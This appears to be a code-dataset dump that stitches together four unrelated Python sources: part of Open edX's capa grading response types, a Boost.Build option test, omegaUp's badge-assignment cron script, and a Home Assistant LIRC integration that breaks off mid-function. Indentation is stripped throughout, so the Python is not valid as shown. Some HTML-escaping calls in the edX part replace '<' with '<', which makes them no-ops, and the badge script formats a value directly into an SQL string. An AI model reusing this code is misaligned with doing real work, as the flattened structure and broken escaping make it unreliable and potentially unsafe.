req = requests.post(self.url, data=payload)
except Exception as err:
msg = 'Error {0} - cannot connect to external server url={1}'.format(err, self.url)
log.error(msg)
raise Exception(msg)
if self.capa_system.DEBUG:
log.info('response = %s', req.text)
if (not req.text) or (not req.text.strip()):
raise Exception(
'Error: no response from external server url=%s' % self.url)
try:
# response is XML; parse it
rxml = etree.fromstring(req.text)
except Exception as err:
msg = 'Error {0} - cannot parse response from external server req.text={1}'.format(err, req.text)
log.error(msg)
raise Exception(msg)
return rxml
def get_score(self, student_answers):
idset = sorted(self.answer_ids)
cmap = CorrectMap()
try:
submission = [student_answers[k] for k in idset]
except Exception as err: # pylint: disable=broad-except
log.error(
'Error %s: cannot get student answer for %s; student_answers=%s',
err,
self.answer_ids,
student_answers
)
raise Exception(err)
self.context.update({'submission': submission})
extra_payload = {'edX_student_response': json.dumps(submission)}
try:
rxml = self.do_external_request('get_score', extra_payload)
except Exception as err: # pylint: disable=broad-except
log.error('Error %s', err)
if self.capa_system.DEBUG:
cmap.set_dict(dict(zip(sorted(
self.answer_ids), ['incorrect'] * len(idset))))
cmap.set_property(
self.answer_ids[0], 'msg',
'<span class="inline-error">%s</span>' % str(err).replace('<', '<'))
return cmap
awd = rxml.find('awarddetail').text
self.context['correct'] = ['correct']
if awd in self.awdmap:
self.context['correct'][0] = self.awdmap[awd]
# create CorrectMap
for key in idset:
idx = idset.index(key)
msg = rxml.find('message').text.replace(
' ', ' ') if idx == 0 else None
cmap.set(key, self.context['correct'][idx], msg=msg)
return cmap
def get_answers(self):
"""
Use external server to get expected answers
"""
try:
rxml = self.do_external_request('get_answers', {})
exans = json.loads(rxml.find('expected').text)
except Exception as err: # pylint: disable=broad-except
log.error('Error %s', err)
if self.capa_system.DEBUG:
msg = '<span class="inline-error">%s</span>' % str(
err).replace('<', '<')
exans = [''] * len(self.answer_ids)
exans[0] = msg
if not (len(exans) == len(self.answer_ids)):
log.error('Expected %s answers from external server, only got %s!',
len(self.answer_ids), len(exans))
raise Exception('Short response from external server')
return dict(zip(self.answer_ids, exans))
#-----------------------------------------------------------------------------
@registry.register
class FormulaResponse(LoncapaResponse):
"""
Checking of symbolic math response using numerical sampling.
"""
human_name = _('Math Expression Input')
tags = ['formularesponse']
hint_tag = 'formulahint'
allowed_inputfields = ['textline', 'formulaequationinput']
required_attributes = ['answer', 'samples']
max_inputfields = 1
def __init__(self, *args, **kwargs):
self.correct_answer = ''
self.samples = ''
self.tolerance = default_tolerance
self.case_sensitive = False
super(FormulaResponse, self).__init__(*args, **kwargs)
def setup_response(self):
xml = self.xml
context = self.context
self.correct_answer = contextualize_text(xml.get('answer'), context)
self.samples = contextualize_text(xml.get('samples'), context)
# Find the tolerance
tolerance_xml = xml.xpath(
'//*[@id=$id]//responseparam[@type="tolerance"]/@default',
id=xml.get('id')
)
if tolerance_xml: # If it isn't an empty list...
self.tolerance = contextualize_text(tolerance_xml[0], context)
types = xml.get('type')
if types is None:
typeslist = []
else:
typeslist = types.split(',')
if 'ci' in typeslist:
# Case insensitive
self.case_sensitive = False
elif 'cs' in typeslist:
# Case sensitive
self.case_sensitive = True
else:
# Default
self.case_sensitive = False
def get_score(self, student_answers):
given = student_answers[self.answer_id]
correctness = self.check_formula(
self.correct_answer,
given,
self.samples
)
return CorrectMap(self.answer_id, correctness)
def tupleize_answers(self, answer, var_dict_list):
"""
Takes in an answer and a list of dictionaries mapping variables to values.
Each dictionary represents a test case for the answer.
Returns a tuple of formula evaluation results.
"""
_ = self.capa_system.i18n.ugettext
out = []
for var_dict in var_dict_list:
try:
out.append(evaluator(
var_dict,
dict(),
answer,
case_sensitive=self.case_sensitive,
))
except UndefinedVariable as err:
log.debug(
'formularesponse: undefined variable in formula=%s',
cgi.escape(answer)
)
raise StudentInputError(
_("Invalid input: {bad_input} not permitted in answer.").format(bad_input=err.message)
)
except ValueError as err:
if 'factorial' in err.message:
# This is thrown when fact() or factorial() is used in a formularesponse answer
# that tests on negative and/or non-integer inputs
# err.message will be: `factorial() only accepts integral values` or
# `factorial() not defined for negative values`
log.debug(
('formularesponse: factorial function used in response '
'that tests negative and/or non-integer inputs. '
'Provided answer was: %s'),
cgi.escape(answer)
)
raise StudentInputError(
_("factorial function not permitted in answer "
"for this problem. Provided answer was: "
"{bad_input}").format(bad_input=cgi.escape(answer))
)
# If non-factorial related ValueError thrown, handle it the same as any other Exception
log.debug('formularesponse: error %s in formula', err)
raise StudentInputError(
_("Invalid input: Could not parse '{bad_input}' as a formula.").format(
bad_input=cgi.escape(answer)
)
)
except Exception as err:
# traceback.print_exc()
log.debug('formularesponse: error %s in formula', err)
raise StudentInputError(
_("Invalid input: Could not parse '{bad_input}' as a formula").format(
bad_input=cgi.escape(answer)
)
)
return out
def randomize_variables(self, samples):
"""
Returns a list of dictionaries mapping variables to random values in range,
as expected by tupleize_answers.
"""
variables = samples.split('@')[0].split(',')
numsamples = int(samples.split('@')[1].split('#')[1])
sranges = zip(*map(lambda x: map(float, x.split(",")),
samples.split('@')[1].split('#')[0].split(':')))
ranges = dict(zip(variables, sranges))
out = []
for _ in range(numsamples):
var_dict = {}
# ranges give numerical ranges for testing
for var in ranges:
# TODO: allow specified ranges (i.e. integers and complex numbers) for random variables
value = random.uniform(*ranges[var])
var_dict[str(var)] = value
out.append(var_dict)
return out
def check_formula(self, expected, given, samples):
"""
Given an expected answer string, a given (student-produced) answer
string, and a samples string, return whether the given answer is
"correct" or "incorrect".
"""
var_dict_list = self.randomize_variables(samples)
student_result = self.tupleize_answers(given, var_dict_list)
instructor_result = self.tupleize_answers(expected, var_dict_list)
correct = all(compare_with_tolerance(student, instructor, self.tolerance)
for student, instructor in zip(student_result, instructor_result))
if correct:
return "correct"
else:
return "incorrect"
def compare_answer(self, ans1, ans2):
"""
An external interface for comparing whether a and b are equal.
"""
internal_result = self.check_formula(ans1, ans2, self.samples)
return internal_result == "correct"
def validate_answer(self, answer):
"""
Returns whether this answer is in a valid form.
"""
var_dict_list = self.randomize_variables(self.samples)
try:
self.tupleize_answers(answer, var_dict_list)
return True
except StudentInputError:
return False
def strip_dict(self, inp_d):
"""
Takes a dict. Returns an identical dict, with all non-word
keys and all non-numeric values stripped out. All values also
converted to float. Used so we can safely use Python contexts.
"""
inp_d = dict([(k, numpy.complex(inp_d[k]))
for k in inp_d if isinstance(k, str) and
k.isalnum() and
isinstance(inp_d[k], numbers.Number)])
return inp_d
def check_hint_condition(self, hxml_set, student_answers):
given = student_answers[self.answer_id]
hints_to_show = []
for hxml in hxml_set:
samples = hxml.get('samples')
name = hxml.get('name')
correct_answer = contextualize_text(
hxml.get('answer'), self.context)
# pylint: disable=broad-except
try:
correctness = self.check_formula(
correct_answer,
given,
samples
)
except Exception:
correctness = 'incorrect'
if correctness == 'correct':
hints_to_show.append(name)
log.debug('hints_to_show = %s', hints_to_show)
return hints_to_show
def get_answers(self):
return {self.answer_id: self.correct_answer}
#-----------------------------------------------------------------------------
@registry.register
class SchematicResponse(LoncapaResponse):
"""
Circuit schematic response type.
"""
human_name = _('Circuit Schematic Builder')
tags = ['schematicresponse']
allowed_inputfields = ['schematic']
def __init__(self, *args, **kwargs):
self.code = ''
super(SchematicResponse, self).__init__(*args, **kwargs)
def setup_response(self):
xml = self.xml
answer = xml.xpath('//*[@id=$id]//answer', id=xml.get('id'))[0]
answer_src = answer.get('src')
if answer_src is not None:
# Untested; never used
self.code = self.capa_system.filestore.open('src/' + answer_src).read()
else:
self.code = answer.text
def get_score(self, student_answers):
#from capa_problem import global_context
submission = [
json.loads(student_answers[k]) for k in sorted(self.answer_ids)
]
self.context.update({'submission': submission})
try:
safe_exec.safe_exec(
self.code,
self.context,
cache=self.capa_system.cache,
python_path=self.context['python_path'],
extra_files=self.context['extra_files'],
slug=self.id,
random_seed=self.context['seed'],
unsafely=self.capa_system.can_execute_unsafe_code(),
)
except Exception as err:
_ = self.capa_system.i18n.ugettext
# Translators: 'SchematicResponse' is a problem type and should not be translated.
msg = _('Error in evaluating SchematicResponse. The error was: {error_msg}').format(error_msg=err)
raise ResponseError(msg)
cmap = CorrectMap()
cmap.set_dict(dict(zip(sorted(self.answer_ids), self.context['correct'])))
return cmap
def get_answers(self):
# use answers provided in input elements
return self.default_answer_map
#-----------------------------------------------------------------------------
@registry.register
class ImageResponse(LoncapaResponse):
"""
Handle student response for image input: the input is a click on an image,
which produces an [x,y] coordinate pair. The click is correct if it falls
within a region specified. This region is a union of rectangles.
Lon-CAPA requires that each <imageresponse> has a <foilgroup> inside it.
That doesn't make sense to me (Ike). Instead, let's have it such that
<imageresponse> should contain one or more <imageinput> stanzas.
Each <imageinput> should specify a rectangle(s) or region(s), given as an
attribute, defining the correct answer.
<imageinput src="/static/images/Lecture2/S2_p04.png" width="811" height="610"
rectangle="(10,10)-(20,30);(12,12)-(40,60)"
regions="[[[10,10], [20,30], [40, 10]], [[100,100], [120,130], [110,150]]]"/>
Regions is list of lists [region1, region2, region3, ...] where regionN
is disordered list of points: [[1,1], [100,100], [50,50], [20, 70]].
If there is only one region in the list, simpler notation can be used:
regions="[[10,10], [30,30], [10, 30], [30, 10]]" (without explicitly
setting outer list)
Returns:
True, if click is inside any region or rectangle. Otherwise False.
"""
human_name = _('Image Mapped Input')
tags = ['imageresponse']
allowed_inputfields = ['imageinput']
def __init__(self, *args, **kwargs):
self.ielements = []
super(ImageResponse, self).__init__(*args, **kwargs)
def setup_response(self):
self.ielements = self.inputfields
self.answer_ids = [ie.get('id') for ie in self.ielements]
def get_score(self, student_answers):
_ = self.capa_system.i18n.ugettext
correct_map = CorrectMap()
expectedset = self.get_mapped_answers()
for aid in self.answer_ids: # loop through IDs of <imageinput>
# Fields in our stanza
given = student_answers[aid] # This should be a string of the form '[x,y]'
correct_map.set(aid, 'incorrect')
if not given: # No answer to parse. Mark as incorrect and move on
continue
# Parse given answer
acoords = re.match(r'\[([0-9]+),([0-9]+)]', given.strip().replace(' ', ''))
if not acoords:
msg = _('error grading {image_input_id} (input={user_input})').format(
image_input_id=aid,
user_input=given
)
raise Exception('[capamodule.capa.responsetypes.imageinput] ' + msg)
(ans_x, ans_y) = [int(x) for x in acoords.groups()]
rectangles, regions = expectedset
if rectangles[aid]: # Rectangles part - for backward compatibility
# Check whether given point lies in any of the solution
# rectangles
solution_rectangles = rectangles[aid].split(';')
for solution_rectangle in solution_rectangles:
# parse expected answer
# TODO: Compile regexp on file load
sr_coords = re.match(
r'[\(\[]([0-9]+),([0-9]+)[\)\]]-[\(\[]([0-9]+),([0-9]+)[\)\]]',
solution_rectangle.strip().replace(' ', ''))
if not sr_coords:
# Translators: {sr_coords} are the coordinates of a rectangle
msg = _('Error in problem specification! Cannot parse rectangle in {sr_coords}').format(
sr_coords=etree.tostring(self.ielements[aid], pretty_print=True)
)
raise Exception('[capamodule.capa.responsetypes.imageinput] ' + msg)
(llx, lly, urx, ury) = [int(x) for x in sr_coords.groups()]
# answer is correct if (x,y) is within the specified
# rectangle
if (llx <= ans_x <= urx) and (lly <= ans_y <= ury):
correct_map.set(aid, 'correct')
break
if correct_map[aid]['correctness'] != 'correct' and regions[aid]:
parsed_region = json.loads(regions[aid])
if parsed_region:
if not isinstance(parsed_region[0][0], list):
# we have [[1,2],[3,4],[5,6]] - single region
# instead of [[[1,2],[3,4],[5,6], [[1,2],[3,4],[5,6]]]
# or [[[1,2],[3,4],[5,6]]] - multiple regions syntax
parsed_region = [parsed_region]
for region in parsed_region:
polygon = MultiPoint(region).convex_hull
if (polygon.type == 'Polygon' and
polygon.contains(Point(ans_x, ans_y))):
correct_map.set(aid, 'correct')
break
return correct_map
def get_mapped_answers(self):
"""
Returns the internal representation of the answers
Input:
None
Returns:
tuple (dict, dict) -
rectangles (dict) - a map of inputs to the defined rectangle for that input
regions (dict) - a map of inputs to the defined region for that input
"""
answers = (
dict([(ie.get('id'), ie.get(
'rectangle')) for ie in self.ielements]),
dict([(ie.get('id'), ie.get('regions')) for ie in self.ielements]))
return answers
def get_answers(self):
"""
Returns the external representation of the answers
Input:
None
Returns:
dict (str, (str, str)) - a map of inputs to a tuple of their rectangle
and their regions
"""
answers = {}
for ielt in self.ielements:
ie_id = ielt.get('id')
answers[ie_id] = {'rectangle': ielt.get('rectangle'), 'regions': ielt.get('regions')}
return answers
#-----------------------------------------------------------------------------
@registry.register
class AnnotationResponse(LoncapaResponse):
"""
Checking of annotation responses.
The response contains both a comment (student commentary) and an option (student tag).
Only the tag is currently graded. Answers may be incorrect, partially correct, or correct.
"""
human_name = _('Annotation Input')
tags = ['annotationresponse']
allowed_inputfields = ['annotationinput']
max_inputfields = 1
default_scoring = {'incorrect': 0, 'partially-correct': 1, 'correct': 2}
def __init__(self, *args, **kwargs):
self.scoring_map = {}
self.answer_map = {}
super(AnnotationResponse, self).__init__(*args, **kwargs)
def setup_response(self):
self.scoring_map = self._get_scoring_map()
self.answer_map = self._get_answer_map()
self.maxpoints = self._get_max_points()
def get_score(self, student_answers):
"""
Returns a CorrectMap for the student answer, which may include
partially correct answers.
"""
student_answer = student_answers[self.answer_id]
student_option = self._get_submitted_option_id(student_answer)
scoring = self.scoring_map[self.answer_id]
is_valid = student_option is not None and student_option in scoring.keys(
)
(correctness, points) = ('incorrect', None)
if is_valid:
correctness = scoring[student_option]['correctness']
points = scoring[student_option]['points']
return CorrectMap(self.answer_id, correctness=correctness, npoints=points)
def get_answers(self):
return self.answer_map
def _get_scoring_map(self):
"""Returns a dict of option->scoring for each input."""
scoring = self.default_scoring
choices = dict([(choice, choice) for choice in scoring])
scoring_map = {}
for inputfield in self.inputfields:
option_scoring = dict([(
option['id'],
{
'correctness': choices.get(option['choice']),
'points': scoring.get(option['choice'])
}
) for option in self._find_options(inputfield)])
scoring_map[inputfield.get('id')] = option_scoring
return scoring_map
def _get_answer_map(self):
"""Returns a dict of answers for each input."""
answer_map = {}
for inputfield in self.inputfields:
correct_option = self._find_option_with_choice(
inputfield, 'correct')
if correct_option is not None:
input_id = inputfield.get('id')
answer_map[input_id] = correct_option.get('description')
return answer_map
def _get_max_points(self):
"""Returns a dict of the max points for each input: input id -> maxpoints."""
scoring = self.default_scoring
correct_points = scoring.get('correct')
return dict([(inputfield.get('id'), correct_points) for inputfield in self.inputfields])
def _find_options(self, inputfield):
"""Returns an array of dicts where each dict represents an option. """
elements = inputfield.findall('./options/option')
return [{
'id': index,
'description': option.text,
'choice': option.get('choice')
} for (index, option) in enumerate(elements)]
def _find_option_with_choice(self, inputfield, choice):
"""Returns the option with the given choice value, otherwise None. """
for option in self._find_options(inputfield):
if option['choice'] == choice:
return option
def _unpack(self, json_value):
"""Unpacks a student response value submitted as JSON."""
json_d = json.loads(json_value)
if not isinstance(json_d, dict):
json_d = {}
comment_value = json_d.get('comment', '')
if not isinstance(json_d, basestring):
comment_value = ''
options_value = json_d.get('options', [])
if not isinstance(options_value, list):
options_value = []
return {
'options_value': options_value,
'comment_value': comment_value
}
def _get_submitted_option_id(self, student_answer):
"""Return the single option that was selected, otherwise None."""
submitted = self._unpack(student_answer)
option_ids = submitted['options_value']
if len(option_ids) == 1:
return option_ids[0]
return None
@registry.register
class ChoiceTextResponse(LoncapaResponse):
"""
Allows for multiple choice responses with text inputs
Desired semantics match those of NumericalResponse and
ChoiceResponse.
"""
human_name = _('Checkboxes With Text Input')
tags = ['choicetextresponse']
max_inputfields = 1
allowed_inputfields = ['choicetextgroup',
'checkboxtextgroup',
'radiotextgroup'
]
def __init__(self, *args, **kwargs):
self.correct_inputs = {}
self.answer_values = {}
self.correct_choices = {}
super(ChoiceTextResponse, self).__init__(*args, **kwargs)
def setup_response(self):
"""
Sets up three dictionaries for use later:
`correct_choices`: These are the correct binary choices(radio/checkbox)
`correct_inputs`: These are the numerical/string answers for required
inputs.
`answer_values`: This is a dict, keyed by the name of the binary choice
which contains the correct answers for the text inputs separated by
commas e.g. "1, 0.5"
`correct_choices` and `correct_inputs` are used for grading the problem
and `answer_values` is used for displaying correct answers.
"""
_ = self.capa_system.i18n.ugettext
context = self.context
self.answer_values = {self.answer_id: []}
self.assign_choice_names()
correct_xml = self.xml.xpath('//*[@id=$id]//choice[@correct="true"]',
id=self.xml.get('id'))
for node in correct_xml:
# For each correct choice, set the `parent_name` to the
# current choice's name
parent_name = node.get('name')
# Add the name of the correct binary choice to the
# correct choices list as a key. The value is not important.
self.correct_choices[parent_name] = {'answer': ''}
# Add the name of the parent to the list of correct answers
self.answer_values[self.answer_id].append(parent_name)
answer_list = []
# Loop over <numtolerance_input> elements inside of the correct choices
for child in node:
answer = child.get('answer', None)
if not answer:
# If the question creator does not specify an answer for a
# <numtolerance_input> inside of a correct choice, raise an error
raise LoncapaProblemError(
_("Answer not provided for {input_type}").format(input_type="numtolerance_input")
)
# Contextualize the answer to allow script generated answers.
answer = contextualize_text(answer, context)
input_name = child.get('name')
# Contextualize the tolerance to value.
tolerance = contextualize_text(
child.get('tolerance', default_tolerance),
context
)
# Add the answer and tolerance information for the current
# numtolerance_input to `correct_inputs`
self.correct_inputs[input_name] = {
'answer': answer,
'tolerance': tolerance
}
# Add the correct answer for this input to the list for show
answer_list.append(answer)
# Turn the list of numtolerance_input answers into a comma separated string.
self.answer_values[parent_name] = ', '.join(answer_list)
# Turn correct choices into a set. Allows faster grading.
self.correct_choices = set(self.correct_choices.keys())
def assign_choice_names(self):
"""
Initialize name attributes in <choice> and <numtolerance_input> tags
for this response.
Example:
Assuming for simplicity that `self.answer_id` = '1_2_1'
Before the function is called `self.xml` =
<radiotextgroup>
<choice correct = "true">
The number
<numtolerance_input answer="5"/>
Is the mean of the list.
</choice>
<choice correct = "false">
False demonstration choice
</choice>
</radiotextgroup>
After this is called the choices and numtolerance_inputs will have a name
attribute initialized and self.xml will be:
<radiotextgroup>
<choice correct = "true" name ="1_2_1_choiceinput_0bc">
The number
<numtolerance_input name = "1_2_1_choiceinput0_numtolerance_input_0"
answer="5"/>
Is the mean of the list.
</choice>
<choice correct = "false" name = "1_2_1_choiceinput_1bc>
False demonstration choice
</choice>
</radiotextgroup>
"""
for index, choice in enumerate(
self.xml.xpath('//*[@id=$id]//choice', id=self.xml.get('id'))
):
# Set the name attribute for <choices>
# "bc" is appended at the end to indicate that this is a
# binary choice as opposed to a numtolerance_input, this convention
# is used when grading the problem
choice.set(
"name",
self.answer_id + "_choiceinput_" + str(index) + "bc"
)
# Set Name attributes for <numtolerance_input> elements
# Look for all <numtolerance_inputs> inside this choice.
numtolerance_inputs = choice.findall('numtolerance_input')
# Look for all <decoy_input> inside this choice
decoys = choice.findall('decoy_input')
# <decoy_input> would only be used in choices which do not contain
# <numtolerance_input>
inputs = numtolerance_inputs if numtolerance_inputs else decoys
# Give each input inside of the choice a name combining
# The ordinality of the choice, and the ordinality of the input
# within that choice e.g. 1_2_1_choiceinput_0_numtolerance_input_1
for ind, child in enumerate(inputs):
child.set(
"name",
self.answer_id + "_choiceinput_" + str(index) +
"_numtolerance_input_" + str(ind)
)
def get_score(self, student_answers):
"""
Returns a `CorrectMap` showing whether `student_answers` are correct.
`student_answers` contains keys for binary inputs(radiobutton,
checkbox) and numerical inputs. Keys ending with 'bc' are binary
choice inputs otherwise they are text fields.
This method first separates the two
types of answers and then grades them in separate methods.
The student is only correct if they have both the binary inputs and
numerical inputs correct.
"""
answer_dict = student_answers.get(self.answer_id, "")
binary_choices, numtolerance_inputs = self._split_answers_dict(answer_dict)
# Check the binary choices first.
choices_correct = self._check_student_choices(binary_choices)
inputs_correct = self._check_student_inputs(numtolerance_inputs)
# Only return correct if the student got both the binary
# and numtolerance_inputs are correct
correct = choices_correct and inputs_correct
return CorrectMap(
self.answer_id,
'correct' if correct else 'incorrect'
)
def get_answers(self):
"""
Returns a dictionary containing the names of binary choices as keys
and a string of answers to any numtolerance_inputs which they may have
e.g {choice_1bc : "answer1, answer2", choice_2bc : ""}
"""
return self.answer_values
def _split_answers_dict(self, a_dict):
"""
Returns two dicts:
`binary_choices` : dictionary {input_name: input_value} for
the binary choices which the student selected.
and
`numtolerance_choices` : a dictionary {input_name: input_value}
for the numtolerance_inputs inside of choices which were selected
Determines if an input is inside of a binary input by looking at
the beginning of it's name.
For example. If a binary_choice was named '1_2_1_choiceinput_0bc'
All of the numtolerance_inputs in it would have an idea that begins
with '1_2_1_choice_input_0_numtolerance_input'
Splits the name of the numtolerance_input at the occurence of
'_numtolerance_input_' and appends 'bc' to the end to get the name
of the choice it is contained in.
Example:
`a_dict` = {
'1_2_1_choiceinput_0bc': '1_2_1_choiceinput_0bc',
'1_2_1_choiceinput_0_numtolerance_input_0': '1',
'1_2_1_choiceinput_0_numtolerance_input_1': '2'
'1_2_1_choiceinput_1_numtolerance_input_0': '3'
}
In this case, the binary choice is '1_2_1_choiceinput_0bc', and
the numtolerance_inputs associated with it are
'1_2_1_choiceinput_0_numtolerance_input_0', and
'1_2_1_choiceinput_0_numtolerance_input_1'.
so the two return dictionaries would be
`binary_choices` = {'1_2_1_choiceinput_0bc': '1_2_1_choiceinput_0bc'}
and
`numtolerance_choices` ={
'1_2_1_choiceinput_0_numtolerance_input_0': '1',
'1_2_1_choiceinput_0_numtolerance_input_1': '2'
}
The entry '1_2_1_choiceinput_1_numtolerance_input_0': '3' is discarded
because it was not inside of a selected binary choice, and no validation
should be performed on numtolerance_inputs inside of non-selected choices.
"""
# Initialize the two dictionaries that are returned
numtolerance_choices = {}
binary_choices = {}
# `selected_choices` is a list of binary choices which were "checked/selected"
# when the student submitted the problem.
# Keys in a_dict ending with 'bc' refer to binary choices.
selected_choices = [key for key in a_dict if key.endswith("bc")]
for key in selected_choices:
binary_choices[key] = a_dict[key]
# Convert the name of a numtolerance_input into the name of the binary
# choice that it is contained within, and append it to the list if
# the numtolerance_input's parent binary_choice is contained in
# `selected_choices`.
selected_numtolerance_inputs = [
key for key in a_dict if key.partition("_numtolerance_input_")[0] + "bc"
in selected_choices
]
for key in selected_numtolerance_inputs:
numtolerance_choices[key] = a_dict[key]
return (binary_choices, numtolerance_choices)
def _check_student_choices(self, choices):
"""
Compares student submitted checkbox/radiobutton answers against
the correct answers. Returns True or False.
True if all of the correct choices are selected and no incorrect
choices are selected.
"""
student_choices = set(choices)
required_selected = len(self.correct_choices - student_choices) == 0
no_extra_selected = len(student_choices - self.correct_choices) == 0
correct = required_selected and no_extra_selected
return correct
def _check_student_inputs(self, numtolerance_inputs):
"""
Compares student submitted numerical answers against the correct
answers and tolerances.
`numtolerance_inputs` is a dictionary {answer_name : answer_value}
Performs numerical validation by means of calling
`compare_with_tolerance()` on all of `numtolerance_inputs`
Performs a call to `compare_with_tolerance` even on values for
decoy_inputs. This is used to validate their numericality and
raise an error if the student entered a non numerical expression.
Returns True if and only if all student inputs are correct.
"""
_ = self.capa_system.i18n.ugettext
inputs_correct = True
for answer_name, answer_value in numtolerance_inputs.iteritems():
# If `self.corrrect_inputs` does not contain an entry for
# `answer_name`, this means that answer_name is a decoy
# input's value, and validation of its numericality is the
# only thing of interest from the later call to
# `compare_with_tolerance`.
params = self.correct_inputs.get(answer_name, {'answer': 0})
correct_ans = params['answer']
# Set the tolerance to '0' if it was not specified in the xml
tolerance = params.get('tolerance', default_tolerance)
# Make sure that the staff answer is a valid number
try:
correct_ans = complex(correct_ans)
except ValueError:
log.debug(
"Content error--answer '%s' is not a valid complex number",
correct_ans
)
raise StudentInputError(
_("The Staff answer could not be interpreted as a number.")
)
# Compare the student answer to the staff answer/ or to 0
# if all that is important is verifying numericality
try:
partial_correct = compare_with_tolerance(
evaluator({}, {}, answer_value),
correct_ans,
tolerance
)
except:
# Use the traceback-preserving version of re-raising with a
# different type
__, __, trace = sys.exc_info()
msg = _("Could not interpret '{given_answer}' as a number.").format(
given_answer=cgi.escape(answer_value)
)
msg += " ({0})".format(trace)
raise StudentInputError(msg)
# Ignore the results of the comparisons which were just for
# Numerical Validation.
if answer_name in self.correct_inputs and not partial_correct:
# If any input is not correct, set the return value to False
inputs_correct = False
return inputs_correct
#-----------------------------------------------------------------------------
# TEMPORARY: List of all response subclasses
# FIXME: To be replaced by auto-registration
# pylint: disable=invalid-all-object
__all__ = [
CodeResponse,
NumericalResponse,
FormulaResponse,
CustomResponse,
SchematicResponse,
ExternalResponse,
ImageResponse,
OptionResponse,
SymbolicResponse,
StringResponse,
ChoiceResponse,
MultipleChoiceResponse,
TrueFalseResponse,
JavascriptResponse,
AnnotationResponse,
ChoiceTextResponse,
]
# pylint: enable=invalid-all-object
|
biospi/seamass-windeps
|
refs/heads/master
|
src/boost_1_57_0/tools/build/test/core_d12.py
|
45
|
#!/usr/bin/python
# Copyright 2002, 2003 Vladimir Prus
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
# This tests correct handling of "-d1" and "-d2" options.
import BoostBuild
t = BoostBuild.Tester(["-ffile.jam"], pass_d0=False, pass_toolset=0)
t.write("file.jam", """\
actions a { }
actions quietly b { }
ALWAYS all ;
a all ;
b all ;
""")
t.run_build_system(["-d0"], stdout="")
t.run_build_system(["-d1"])
t.expect_output_lines("a all")
t.expect_output_lines("b all", False)
t.run_build_system(["-d2"])
t.expect_output_lines("a all")
t.expect_output_lines("b all")
t.cleanup()
|
samdsmx/omegaup
|
refs/heads/master
|
stuff/cron/assign_badges.py
|
2
|
#!/usr/bin/python3
''' Assigns users badges and creates the notifications.'''
import argparse
import datetime
import json
import logging
import os
import sys
from typing import Optional, Set
import MySQLdb
sys.path.insert(
0,
os.path.join(
os.path.dirname(os.path.dirname(os.path.realpath(__file__))), "."))
import lib.db # pylint: disable=wrong-import-position
import lib.logs # pylint: disable=wrong-import-position
BADGES_PATH = os.path.abspath(os.path.join(__file__, '..', '..',
'..', 'frontend/badges'))
def get_all_owners(badge: str, current_timestamp: Optional[datetime.datetime],
cur: MySQLdb.cursors.DictCursor) -> Set[int]:
'''Returns a set of ids of users who should receive the badge'''
with open(os.path.join(BADGES_PATH, badge, 'query.sql')) as fd:
query = fd.read()
if current_timestamp is not None:
query = query.replace(
'NOW()', f"'{current_timestamp.strftime('%Y-%m-%d %H:%M:%S')}'")
cur.execute(query)
results = set()
for row in cur:
results.add(row['user_id'])
return results
def get_current_owners(badge: str,
cur: MySQLdb.cursors.DictCursor) -> Set[int]:
'''Returns a set of ids of current badge owners'''
cur.execute('''
SELECT
ub.user_id
FROM
Users_Badges ub
WHERE
ub.badge_alias = '%s';''' % badge)
results = set()
for row in cur:
results.add(row['user_id'])
return results
def save_new_owners(badge: str, users: Set[int],
cur: MySQLdb.cursors.DictCursor) -> None:
'''Adds new badge owners entries to Users_Badges table'''
badges_tuples = []
notifications_tuples = []
for user in users:
badges_tuples.append((user, badge))
notifications_tuples.append((
user, json.dumps({'type': 'badge', 'badge': badge})))
cur.executemany('''
INSERT INTO
Users_Badges (user_id, badge_alias)
VALUES (%s, %s);''', badges_tuples)
cur.executemany('''
INSERT INTO
Notifications (user_id, contents)
VALUES (%s, %s)''', notifications_tuples)
def process_badges(current_timestamp: Optional[datetime.datetime],
cur: MySQLdb.cursors.DictCursor) -> None:
'''Processes all badges'''
badges = [f.name for f in os.scandir(BADGES_PATH) if f.is_dir()]
for badge in badges:
logging.info('==== Badge %s ====', badge)
try:
all_owners = get_all_owners(badge, current_timestamp, cur)
current_owners = get_current_owners(badge, cur)
new_owners = all_owners - current_owners
logging.info('New owners: %s', new_owners)
if new_owners:
save_new_owners(badge, new_owners, cur)
except: # noqa: bare-except
logging.exception('Something went wrong with badge: %s.', badge)
raise
def main() -> None:
'''Main entrypoint.'''
parser = argparse.ArgumentParser(
description='Assign badges and create notifications.')
parser.add_argument(
'--current-timestamp',
type=lambda s: datetime.datetime.strptime(s, '%Y-%m-%d %H:%M:%S'))
lib.db.configure_parser(parser)
lib.logs.configure_parser(parser)
args = parser.parse_args()
lib.logs.init(parser.prog, args)
logging.info('Started')
dbconn = lib.db.connect(args)
try:
with dbconn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cur:
process_badges(args.current_timestamp, cur) # type: ignore
dbconn.commit()
finally:
dbconn.close()
logging.info('Finished')
if __name__ == '__main__':
main()
|
pschmitt/home-assistant
|
refs/heads/dev
|
homeassistant/components/lirc/__init__.py
|
18
|
"""Support for LIRC devices."""
# pylint: disable=no-member, import-error
import logging
import threading
import time
import lirc
import voluptuous as vol
from homeassistant.const import EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP
_LOGGER = logging.getLogger(__name__)
BUTTON_NAME = "button_name"
DOMAIN = "lirc"
EVENT_IR_COMMAND_RECEIVED = "ir_command_received"
ICON = "mdi:remote"
CONFIG_SCHEMA = vol.Schema({DOMAIN: vol.Schema({})}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
"""Set up the LIRC capability."""
# blocking=True gives unexpected behavior (multiple responses for 1 press)
# also by not blocking, we allow hass to shut down the thread gracefully
# on exit.
lirc.init("home-assistant", blocking=False)
lirc_interface = LircInterface(hass)
def _start_lirc(_event):
lirc_interface.start()
def _stop_lirc(_event):
lirc_interface.stopped.set()
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, _start_lirc)
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, _stop_lirc)
return True
class LircInterface(threading.Thread):
"""
This interfaces with the lirc daemon to read IR commands.
When using lirc in blocking mode, sometimes repeated commands get produced
in the next read of a command so we use a thread here to just wait
around until a non-empty response is obtained from lirc.
"""
def __init__(self, hass):
"""Construct a LIRC interface object."""
threading.Thread.__init__(self)
self.daemon = True
self.stopped = threading.Event()
self.hass = hass
def run(self):
"""Run the loop of the LIRC interface thread."""
_LOGGER.debug("LIRC interface thread started")
while not self.stopped.isSet():
try:
